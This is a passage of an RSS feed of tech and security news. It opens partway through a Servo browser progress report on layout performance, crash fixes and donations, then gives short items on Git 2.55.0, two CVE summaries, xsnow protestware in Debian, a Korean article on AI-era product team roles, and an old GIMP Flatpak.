<strong>CanvasRenderingContext2D</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44831">#44831</a>).</p>
<h3>Performance <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#performance">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>We’ve built a tool that will help us improve <strong>‘about:memory’</strong> by finding untracked allocations (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/44674">#44674</a>, <a href="https://github.com/servo/servo/pull/44980">#44980</a>).</p>
<p>Servo now requires fewer OS threads per CPU, after we combined the <strong>thread pools</strong> for the image cache, web storage, and IndexedDB (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44307">#44307</a>).</p>
<p>We’ve landed a bunch of <strong>layout</strong> optimisations:</p>
<ul>
<li>
<p>The fragment tree is now <strong>immutable</strong> for the most part, with small pockets of interior mutability where mutability is needed.
This means that most fragment tree accesses no longer have to incur the runtime cost of borrowing an <a href="https://docs.rs/atomic_refcell/0.1.14/atomic_refcell/">AtomicRefCell</a> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/44849">#44849</a>).</p>
</li>
<li>
<p>Two steps in the layout process, calculating <strong>containing blocks</strong> and building the <strong>stacking context tree</strong>, require traversing the fragment tree.
This can be expensive, but we’ve now combined them into a <strong>single fragment tree traversal</strong> in most cases (<a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44911">#44911</a>, <a href="https://github.com/servo/servo/pull/45210">#45210</a>).</p>
</li>
<li>
<p>Another step in the layout process, calculating <strong>scrollable overflow</strong>, used to require traversing the entire fragment tree.
We’ve effectively eliminated that traversal, by making the calculation both <strong>lazy</strong> and <strong>incremental</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/44854">#44854</a>).</p>
</li>
<li>
<p>We’ve improved the caching of fragments, shaping results, and other layout results between reflows (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/45038">#45038</a>, <a href="https://github.com/servo/servo/pull/44769">#44769</a>).</p>
</li>
<li>
<p>We’ve made incremental fragment layout more precise (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44925">#44925</a>).</p>
</li>
<li>
<p>We’ve reduced the memory usage of text shaping (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44609">#44609</a>).</p>
</li>
</ul>
<p><strong>DOM attributes</strong> are much more efficient in this release:</p>
<ul>
<li>
<p>When scripts write attribute values, we avoid serialising them until the attribute is read back by a script (if ever), speeding up frequent writes to inline styles by up to 25% (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44931">#44931</a>).</p>
</li>
<li>
<p>When we parse attributes in HTML or read attribute values internally, we avoid constructing <a href="https://developer.mozilla.org/en-US/docs/Web/API/Attr">Attr</a> nodes until a script <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/getAttributeNode">actually</a> <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/attributes">needs</a> them, reducing memory usage and making garbage collection less likely (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44209">#44209</a>, <a href="https://github.com/servo/servo/pull/45023">#45023</a>, <a href="https://github.com/servo/servo/pull/45031">#45031</a>, <a href="https://github.com/servo/servo/pull/45060">#45060</a>).</p>
</li>
</ul>
<p>We’ve eliminated a traversal of the whole DOM tree whenever an <strong>&lt;iframe&gt;</strong> is attached to the tree, which is especially noticeable when parsing documents with many &lt;iframe&gt; tags (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/45236">#45236</a>).</p>
<p>Stylesheet locks now use <a href="https://docs.rs/atomic_refcell/0.1.14/atomic_refcell/">AtomicRefCell</a>, which is even more efficient than a <a href="https://docs.rs/parking_lot/0.12.5/parking_lot/">parking_lot</a>::<a href="https://docs.rs/parking_lot/0.12.5/parking_lot/type.RwLock.html">RwLock</a> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44883">#44883</a>).</p>
<p>On OpenHarmony, we now have a real refresh driver for reduced idle CPU usage (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44927">#44927</a>), and we now cache the font list on disk for faster startup (<a href="https://github.com/RichardTjokroutomo">@RichardTjokroutomo</a>, <a href="https://github.com/d-desyatkin">@d-desyatkin</a>, <a href="https://github.com/servo/servo/pull/44158">#44158</a>).</p>
<p>We’ve also reduced allocations, GC rooting steps, and other operations in many parts of Servo (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/SteveSharonSam">@SteveSharonSam</a>, <a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/nodelpit">@nodelpit</a>, <a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44961">#44961</a>, <a href="https://github.com/servo/servo/pull/44944">#44944</a>, <a href="https://github.com/servo/servo/pull/44972">#44972</a>, <a href="https://github.com/servo/servo/pull/45231">#45231</a>, <a href="https://github.com/servo/servo/pull/45078">#45078</a>, <a href="https://github.com/servo/servo/pull/44662">#44662</a>, <a href="https://github.com/servo/servo/pull/44679">#44679</a>, <a href="https://github.com/servo/servo/pull/44967">#44967</a>, <a href="https://github.com/servo/servo/pull/44963">#44963</a>, <a href="https://github.com/servo/servo/pull/44933">#44933</a>, <a href="https://github.com/servo/servo/pull/44935">#44935</a>, <a href="https://github.com/servo/servo/pull/44905">#44905</a>).</p>
<p>To improve Servo’s <strong>build times</strong>, we’re moving more code out of our massive <strong>script crate</strong> (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44598">#44598</a>, <a href="https://github.com/servo/servo/pull/44636">#44636</a>, <a href="https://github.com/servo/servo/pull/44823">#44823</a>), and reduced the size of our dependency tree (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44818">#44818</a>).</p>
<h3>Stability <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#stability">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>Several crashes and hangs have been fixed:</p>
<ul>
<li>in <strong>‘content’</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/45227">#45227</a>, <a href="https://github.com/servo/servo/pull/44762">#44762</a>)</li>
<li>in <strong>Media­Stream</strong> (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44781">#44781</a>)</li>
<li>in <strong>item()</strong> on <strong>attributes</strong> on <strong>Element</strong> (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/44721">#44721</a>)</li>
<li>in <strong>append­Rule()</strong> on <strong>CSS­Keyframes­Rule</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/45173">#45173</a>)</li>
<li>in <strong>init­Event()</strong> on <strong>Focus­Event</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44870">#44870</a>)</li>
<li>in <strong>stop()</strong> on <strong>Window</strong> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44804">#44804</a>)</li>
<li>in <code>document.exec­Command(​"delete")</code> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44748">#44748</a>)</li>
<li>in <code>--debug-mozjs</code> builds (<a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/SharanRP">@SharanRP</a>, <a href="https://github.com/servo/servo/pull/44745">#44745</a>, <a href="https://github.com/servo/servo/pull/45001">#45001</a>)</li>
<li>when evaluating scripts in DevTools while paused (<a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/servo/servo/pull/45050">#45050</a>)</li>
<li>when previewing some JS values in DevTools (<a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/servo/servo/pull/45054">#45054</a>)</li>
<li>when shaping zero-width spaces in layout (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/45176">#45176</a>)</li>
<li>when toggling servoshell’s experimental mode at runtime (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/45226">#45226</a>)</li>
</ul>
<p>We’ve continued our long-running effort to <strong>use the Rust type system</strong> to make certain kinds of dynamic borrow failures impossible (<a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/MavenRain">@MavenRain</a>, <a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/SteveSharonSam">@SteveSharonSam</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/elomscansio">@elomscansio</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44712">#44712</a>, <a href="https://github.com/servo/servo/pull/44759">#44759</a>, <a href="https://github.com/servo/servo/pull/44879">#44879</a>, <a href="https://github.com/servo/servo/pull/45014">#45014</a>, <a href="https://github.com/servo/servo/pull/45058">#45058</a>, <a href="https://github.com/servo/servo/pull/45061">#45061</a>, <a href="https://github.com/servo/servo/pull/45076">#45076</a>, <a href="https://github.com/servo/servo/pull/45098">#45098</a>, <a href="https://github.com/servo/servo/pull/45110">#45110</a>, <a href="https://github.com/servo/servo/pull/45149">#45149</a>, <a href="https://github.com/servo/servo/pull/45117">#45117</a>, <a href="https://github.com/servo/servo/pull/45184">#45184</a>, <a href="https://github.com/servo/servo/pull/45201">#45201</a>, <a href="https://github.com/servo/servo/pull/44806">#44806</a>, <a href="https://github.com/servo/servo/pull/44930">#44930</a>, <a href="https://github.com/servo/servo/pull/44942">#44942</a>, <a href="https://github.com/servo/servo/pull/44946">#44946</a>, <a href="https://github.com/servo/servo/pull/45233">#45233</a>, <a href="https://github.com/servo/servo/pull/45181">#45181</a>, <a href="https://github.com/servo/servo/pull/44659">#44659</a>, <a href="https://github.com/servo/servo/pull/44660">#44660</a>, <a href="https://github.com/servo/servo/pull/44664">#44664</a>, <a href="https://github.com/servo/servo/pull/44668">#44668</a>, <a href="https://github.com/servo/servo/pull/44992">#44992</a>, <a href="https://github.com/servo/servo/pull/45000">#45000</a>, <a href="https://github.com/servo/servo/pull/45081">#45081</a>, <a href="https://github.com/servo/servo/pull/45009">#45009</a>, <a href="https://github.com/servo/servo/pull/45225">#45225</a>, <a href="https://github.com/servo/servo/pull/45087">#45087</a>, <a href="https://github.com/servo/servo/pull/45244">#45244</a>, <a href="https://github.com/servo/servo/pull/45245">#45245</a>, <a href="https://github.com/servo/servo/pull/45247">#45247</a>, <a href="https://github.com/servo/servo/pull/44663">#44663</a>, <a href="https://github.com/servo/servo/pull/44665">#44665</a>, <a href="https://github.com/servo/servo/pull/44993">#44993</a>, <a href="https://github.com/servo/servo/pull/45040">#45040</a>, <a href="https://github.com/servo/servo/pull/45053">#45053</a>, <a href="https://github.com/servo/servo/pull/44647">#44647</a>, <a href="https://github.com/servo/servo/pull/44671">#44671</a>, <a href="https://github.com/servo/servo/pull/44681">#44681</a>, <a href="https://github.com/servo/servo/pull/44717">#44717</a>, <a href="https://github.com/servo/servo/pull/44733">#44733</a>, <a href="https://github.com/servo/servo/pull/44686">#44686</a>, <a href="https://github.com/servo/servo/pull/44653">#44653</a>).</p>
<h3>New contributors <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#new-contributors">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>A special thanks to the following people for landing their first patch in Servo:</p>
<ul>
<li>AbdAlRahman Gad (<a href="https://github.com/AbdAlRahmanGad">@AbdAlRahmanGad</a>, <a href="https://github.com/servo/servo/pull/45213">#45213</a>)</li>
<li>Onyeka Obi (<a href="https://github.com/MavenRain">@MavenRain</a>, <a href="https://github.com/servo/servo/pull/44806">#44806</a>)</li>
<li>Steve Sharon Sam (<a href="https://github.com/SteveSharonSam">@SteveSharonSam</a>, <a href="https://github.com/servo/servo/pull/45030">#45030</a>)</li>
<li>avis137 (<a href="https://github.com/avis137">@avis137</a>, <a href="https://github.com/servo/servo/pull/44837">#44837</a>)</li>
<li>Xabier Rodríguez (<a href="https://github.com/calvaris">@calvaris</a>, <a href="https://github.com/servo/servo/pull/45084">#45084</a>)</li>
<li>June (<a href="https://github.com/kimjune01">@kimjune01</a>, <a href="https://github.com/servo/servo/pull/44816">#44816</a>)</li>
<li>Matt Van Horn (<a href="https://github.com/mvanhorn">@mvanhorn</a>, <a href="https://github.com/servo/servo/pull/44740">#44740</a>)</li>
<li>nicole (<a href="https://github.com/n0blenote">@n0blenote</a>, <a href="https://github.com/servo/servo/pull/44704">#44704</a>)</li>
<li>panxt8 (<a href="https://github.com/panxt8">@panxt8</a>, <a href="https://github.com/servo/servo/pull/44991">#44991</a>)</li>
</ul>
<p>Interested in helping build a web browser?
Take a look at our <a href="https://starters.servo.org/">curated list</a> of issues that are good for new contributors!</p>
<h3>Donations <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#donations">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>Thanks again for your generous support!
We are now receiving <strong>7659 USD/month</strong> (+4.2% from April) in recurring donations.
This helps us cover the cost of our <strong><a href="https://ci0.servo.org/">speedy</a> <a href="https://ci1.servo.org/">CI</a> <a href="https://ci2.servo.org/">and</a> <a href="https://ci3.servo.org/">benchmarking</a> <a href="https://ci4.servo.org/">servers</a></strong>, one of our latest <strong><a href="https://www.outreachy.org/alums/2026-05/#:~:text=Servo">Outreachy interns</a></strong>, and funding <strong><a href="https://servo.org/blog/2025/09/17/your-donations-at-work-funding-jdm/">maintainer work</a></strong> that helps more people contribute to Servo.</p>
<p>Servo is also on <a href="https://thanks.dev/">thanks.dev</a>, and already <strong>35 GitHub users</strong> (+2 from April) that depend on Servo are sponsoring us there.
If you use Servo libraries like <a href="https://crates.io/crates/url/reverse_dependencies">url</a>, <a href="https://crates.io/crates/html5ever/reverse_dependencies">html5ever</a>, <a href="https://crates.io/crates/selectors/reverse_dependencies">selectors</a>, or <a href="https://crates.io/crates/cssparser/reverse_dependencies">cssparser</a>, signing up for <a href="https://thanks.dev/">thanks.dev</a> could be a good way for you (or your employer) to give back to the community.</p>
<p>We now have <a href="https://servo.org/blog/2025/11/21/sponsorship-tiers/"><strong>sponsorship tiers</strong></a> that allow you or your organisation to donate to the Servo project with public acknowlegement of your support.
If you’re interested in this kind of sponsorship, please contact us at <a href="mailto:join@servo.org">join@servo.org</a>.</p>
<figure class="_fig"><div class="_flex">
    <div>
        <div><strong>7659</strong> USD/month</div>
        <div></div>
        <div></div>
        <div><strong>10000</strong></div>
    </div>
    <progress max="10000" value="7659"></progress>
</div></figure>
<p>Use of donations is decided transparently via the Technical Steering Committee’s public <strong><a href="https://github.com/servo/project/blob/main/FUNDING_REQUEST.md">funding request process</a></strong>, and active proposals are tracked in <a href="https://github.com/servo/project/issues/187">servo/project#187</a>.
For more details, head to our <a href="https://servo.org/sponsorship/">Sponsorship page</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Git 2.55.0 released]]></title>
<description><![CDATA[Git maintainer Junio Hamano has announced
Git 2.55.0, which has non-merge commits from 100 people; 33 of
those are first-time contributors to the project. LWN recently covered some of
the noteworthy changes in 2.55, including new features for the
experimental "git history" command, addition of th...]]></description>
<link>https://tsecurity.de/de/3633985/linux-tipps/git-2550-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633985/linux-tipps/git-2550-released/</guid>
<pubDate>Mon, 29 Jun 2026 22:24:01 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Git maintainer Junio Hamano has <a href="https://lwn.net/ml/all/xmqqv7b1w9vr.fsf%40gitster.g/">announced</a>
Git 2.55.0, which has non-merge commits from 100 people; 33 of
those are first-time contributors to the project. LWN <a href="https://lwn.net/Articles/1079596/">recently covered</a> some of
the noteworthy changes in 2.55, including new features for the
experimental "<tt>git history</tt>" command, addition of the Git <a href="https://www.man7.org/linux/man-pages/man1/git-fsmonitor--daemon.1.html">fsmonitor</a>
daemon for Linux systems, and more.</p>

<p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-21490 | angular 1.3.0 ng-srcset Directive redos (SNYK-JS-ANGULAR-6091113 / Nessus ID 242412)]]></title>
<description><![CDATA[A vulnerability has been found in angular 1.3.0 and classified as problematic. This issue affects some unknown processing of the component ng-srcset Directive Handler. Performing a manipulation results in inefficient regular expression complexity. This vulnerability only affects products that are...]]></description>
<link>https://tsecurity.de/de/3633546/sicherheitsluecken/cve-2024-21490-angular-130-ng-srcset-directive-redos-snyk-js-angular-6091113-nessus-id-242412/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633546/sicherheitsluecken/cve-2024-21490-angular-130-ng-srcset-directive-redos-snyk-js-angular-6091113-nessus-id-242412/</guid>
<pubDate>Mon, 29 Jun 2026 18:45:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/angular">angular 1.3.0</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects some unknown processing of the component <em>ng-srcset Directive Handler</em>. Performing a manipulation results in inefficient regular expression complexity. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2024-21490">CVE-2024-21490</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Xsnow "protestware" in Debian]]></title>
<description><![CDATA[The xsnow
application, which generates an animated snowfall effect (and other
pleasant diversions) for X11 desktops, does not seem like an obvious
channel for political statements. Nevertheless, xsnow's maintainer
seems to have included a political protest in the program: an
Easter egg that is tr...]]></description>
<link>https://tsecurity.de/de/3633403/linux-tipps/xsnow-protestware-in-debian/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633403/linux-tipps/xsnow-protestware-in-debian/</guid>
<pubDate>Mon, 29 Jun 2026 17:56:23 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The <a href="https://www.ratrabbit.nl/ratrabbit/xsnow/index.html">xsnow</a>
application, which generates an animated snowfall effect (and other
pleasant diversions) for X11 desktops, does not seem like an obvious
channel for political statements. Nevertheless, xsnow's maintainer
seems to have included a political protest in the program: an
Easter egg that is triggered when the program's language is set to Russia
("ru"). One user has complained that this functionality should be
removed from the Debian <a href="https://packages.debian.org/STABLE/games/xsnow">xsnow
package</a>, but Debian does not seem to have any rules that forbid
such a feature outright.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13522 | Investintech SlimPDFReader up to 2.0.14 PDF File SlimPDFReader.exe TeighaDo+0x25cde0 out-of-bounds (EUVD-2026-40019)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Investintech SlimPDFReader up to 2.0.14. Affected by this issue is the function SlimPDFReader!Investintech::PCV::TeighaDo+0x25cde0 of the file SlimPDFReader.exe of the component PDF File Handler. Performing a manipulation res...]]></description>
<link>https://tsecurity.de/de/3632787/sicherheitsluecken/cve-2026-13522-investintech-slimpdfreader-up-to-2014-pdf-file-slimpdfreaderexe-teighado-0x25cde0-out-of-bounds-euvd-2026-40019/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632787/sicherheitsluecken/cve-2026-13522-investintech-slimpdfreader-up-to-2014-pdf-file-slimpdfreaderexe-teighado-0x25cde0-out-of-bounds-euvd-2026-40019/</guid>
<pubDate>Mon, 29 Jun 2026 13:54:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/investintech:slimpdfreader">Investintech SlimPDFReader up to 2.0.14</a>. Affected by this issue is the function <code>SlimPDFReader!Investintech::PCV::TeighaDo+0x25cde0</code> of the file <em>SlimPDFReader.exe</em> of the component <em>PDF File Handler</em>. Performing a manipulation results in out-of-bounds read. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-13522">CVE-2026-13522</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[클로드 코드 총괄 “프로토타이퍼·빌더·그로워…AI 시대 조직은 이렇게 바뀐다”]]></title>
<description><![CDATA[앤트로픽에서 AI 코딩 도구 클로드 코드 개발을 주도하고 관련 팀을 총괄하는 보리스 체르니(Boris Cherny)는 28일 X를 통해 내부 제품 조직을 관찰한 결과를 바탕으로 미래 제품 조직의 다섯 가지 핵심 역할을 제시했다.



첫 번째는 ‘프로토타이퍼(Prototyper)’다. 새로운 아이디어를 끊임없이 발굴하고 빠르게 실험하는 역할이다. 수많은 아이디어를 만들어내지만 실제 제품으로 이어지는 것은 일부에 그친다.



두 번째는 ‘빌더(Builder)’다. 프로토타입이나 아이디어를 빠르게 실제 서비스 수준의 제품과 인프...]]></description>
<link>https://tsecurity.de/de/3632553/it-nachrichten/ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632553/it-nachrichten/ai/</guid>
<pubDate>Mon, 29 Jun 2026 12:03:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>앤트로픽에서 AI 코딩 도구 클로드 코드 개발을 주도하고 관련 팀을 총괄하는 <a href="https://www.linkedin.com/in/bcherny/" target="_blank" rel="nofollow">보리스 체르니</a>(Boris Cherny)는 28일 <a href="https://x.com/bcherny/status/2071379474277613732" target="_blank" rel="nofollow">X를 통해</a> 내부 제품 조직을 관찰한 결과를 바탕으로 미래 제품 조직의 다섯 가지 핵심 역할을 제시했다.</p>



<p>첫 번째는 ‘프로토타이퍼(Prototyper)’다. 새로운 아이디어를 끊임없이 발굴하고 빠르게 실험하는 역할이다. 수많은 아이디어를 만들어내지만 실제 제품으로 이어지는 것은 일부에 그친다.</p>



<p>두 번째는 ‘빌더(Builder)’다. 프로토타입이나 아이디어를 빠르게 실제 서비스 수준의 제품과 인프라로 구현하는 역할이다.</p>



<p>세 번째는 ‘스위퍼(Sweeper)’다. 사용자 인터페이스(UI)를 다듬고 코드와 시스템을 단순화하며, 불필요한 기능을 제거하고 성능을 최적화하는 역할을 맡는다.</p>



<p>네 번째는 ‘그로워(Grower)’다. 이미 출시된 제품을 지속적으로 개선하며 제품-시장 적합성(PMF·Product-Market Fit)을 높이는 데 집중한다.</p>



<p>마지막은 ‘메인터이너(Maintainer)’다. 성숙한 시스템의 보안성과 안정성, 성능, 운영 효율성을 유지하고 서비스 확장을 책임지는 역할이다.</p>



<p>체르니는 “많은 사람은 이 가운데 두 가지 역할을 수행하고, 때로는 세 가지 역할까지 아우른다”며 “흥미로운 점은 이러한 역할이 기존 직무와는 크게 관련이 없다는 것”이라고 설명했다.</p>



<p>그는 “앤트로픽에서도 디자이너 가운데는 프로토타이퍼에 가까운 사람이 있는가 하면, 빌더나 스위퍼 역할을 수행하는 사람도 있다”며 “엔지니어, PM, 데이터 사이언티스트 역시 마찬가지”라고 덧붙였다.</p>



<p>또한 체르니는 건강한 제품 조직은 제품의 성장 단계에 따라 필요한 역할의 조합이 달라진다고 설명했다. 초기 제품에는 새로운 아이디어를 만들고 이를 빠르게 구현·정리하는 역할이 중요하다. 제품이 성장하기 시작하면 이를 지속적으로 개선해 PMF를 높이는 역할과 시스템 안정성을 유지하는 역할이 추가된다. PMF를 확보한 성숙한 제품에서는 안정성과 성능 개선, 지속적인 제품 고도화가 핵심이 되며, 새로운 기능 개발을 담당하는 역할은 일부만 필요하다는 설명이다.</p>



<p>체르니는 “어쩌면 미래의 제품 조직은 지금처럼 엔지니어, 디자이너, PM 등 직무별로 구분되기보다 이러한 역할(archetype) 중심으로 구성되는 형태에 더 가까워질지도 모른다”고 밝혔다.</p>



<p>몇몇 IT 업계 리더들도 비슷한 전망을 내놓은 바 있다. 마이크로소프트(MS) CEO 사티아 나델라는 AI 시대에는 업무 방식뿐 아니라 직무의 범위 자체가 재편되고 있다고 진단했다.</p>



<p>나델라는 2025년 공개된 <a href="https://www.youtube.com/watch?v=AUUZuzVHKdo" target="_blank" rel="nofollow">와이콤비네이터(Y Combinator)와의 대담</a>에서 MS가 보유한 링크드인을 사례로 들며 “링크드인은 기존에 별도로 운영되던 제품 디자인, 프런트엔드 엔지니어링, 제품 관리(PM) 기능을 하나의 역할인 ‘풀스택 빌더(Full-stack Builder)’로 통합하기 시작했다”고 설명했다. 그는 “이는 직무의 범위 자체가 달라지고 있다는 의미”라며 “새로운 역할과 직무 범위에 맞춰 제품팀을 어떻게 다시 설계할 것인지가 중요한 과제가 되고 있다”고 말했다.</p>



<p>나델라는 이 같은 변화가 AI 도입의 핵심 병목 중 하나인 ‘변화 관리(change management)’ 문제와 직결된다고 강조했다. 그는 “보험사, 금융사, 헬스케어 기업, 소프트웨어 기업 모두 일하는 방식 전체를 바꾸는 것”이라며 “어떤 직무인지 자체가 달라지는 것”이라고 덧붙였다.</p>



<p>메타(Meta)의 CTO 앤드루 보즈워스도 비슷한 견해를 밝혔다. 그는 2025년 자신의 인스타그램 계정을 통한 <a href="https://www.businessinsider.com/meta-cto-andrew-bosworth-predictions-ai-impact-on-software-engineering-2025-8" target="_blank" rel="nofollow">라이브 세션</a>에서 AI 도구를 완전히 습득한 개발자와 그렇지 못한 개발자 사이에 “역량의 계층화(tiering of capability)”가 심화될 것이라고 경고했다. 보즈워스는 “AI 도구를 완벽히 익혀 도구로도 대체될 수 없는 엔지니어는 프리미엄을 받게 되고, 그렇지 못한 엔지니어는 데이터 수집이나 레이블링 같은 도구 하위 계층의 작업으로 밀려나게 된다”고 말했다. 그는 “직원 수는 적지만 수십억 명의 사용자를 보유한 기업이 등장하게 될 것”이라며 AI가 소프트웨어 산업을 위축시키는 것이 아니라 오히려 성장시킬 것이라고 강조했다.<br>jihyun.lee@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Run a 30-year old version of GIMP on modern Linux via Flatpak]]></title>
<description><![CDATA[Every wondered what GIMP looked like in 1996, before GTK? Well, now you can. Developer balooii has packaged GIMP 0.54 as a Flatpak that runs on modern 64-bit Linux desktops with Wayland. It’s apparently the earliest version of the app with the source code still available to build. It’s not an off...]]></description>
<link>https://tsecurity.de/de/3631756/linux-tipps/run-a-30-year-old-version-of-gimp-on-modern-linux-via-flatpak/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631756/linux-tipps/run-a-30-year-old-version-of-gimp-on-modern-linux-via-flatpak/</guid>
<pubDate>Mon, 29 Jun 2026 03:39:42 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Every wondered what GIMP looked like in 1996, before GTK? Well, now you can. Developer balooii has packaged GIMP 0.54 as a Flatpak that runs on modern 64-bit Linux desktops with Wayland. It’s apparently the earliest version of the app with the source code still available to build. It’s not an official GIMP effort, but an enthusiast project hosted on the GNOME GitLab. It’s also something of a work-in-progress package of an ancient work-in-progress beta release, with the maintainer promising more plugins and tutorials in time. Before we get to the install bit, there is a bit of trivia-laden history […]</p>
<p>You're reading <a href="https://www.omgubuntu.co.uk/2026/06/gimp-1996-flatpak">Run a 30-year old version of GIMP on modern Linux via Flatpak</a>, a blog post from <a href="https://www.omgubuntu.co.uk/">OMG! Ubuntu</a>. Do not reproduce elsewhere without permission.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-37524 | HCL Traveler for Microsoft Outlook up to 3.0.5 unmaintained third party components (KB0131418 / EUVD-2023-60599)]]></title>
